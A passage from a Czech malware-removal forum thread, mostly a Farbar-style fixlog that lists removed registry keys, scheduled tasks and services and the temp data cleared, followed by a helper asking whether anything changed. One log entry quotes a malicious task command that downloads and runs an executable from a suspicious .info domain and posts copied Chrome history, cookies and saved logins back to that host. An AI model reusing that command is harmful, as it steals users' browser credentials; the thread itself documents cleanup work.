SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
*****************

Processes closed successfully.
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
HKLM\System\CurrentControlSet\Services\tmlwf => removed successfully
tmlwf => service removed successfully
HKLM\System\CurrentControlSet\Services\tmwfp => removed successfully
tmwfp => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore" => not found
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
"HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 39858649 B
Java, Flash, Steam htmlcache => 75 B
Windows/system/drivers => 353557217 B
Edge => 0 B
Chrome => 8015508 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83565 B
systemprofile32 => 149793 B
LocalService => 216501 B
NetworkService => 1692181 B
PC => 4805834241 B

RecycleBin => 1908484100 B
EmptyTemp: => 6.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 21:10:35 ====

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 21:07
od Rudy
Smazáno. Nastala nějaká změna?
Všechny časy jsou v UTC+01:00
Stránka 1 z 1

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz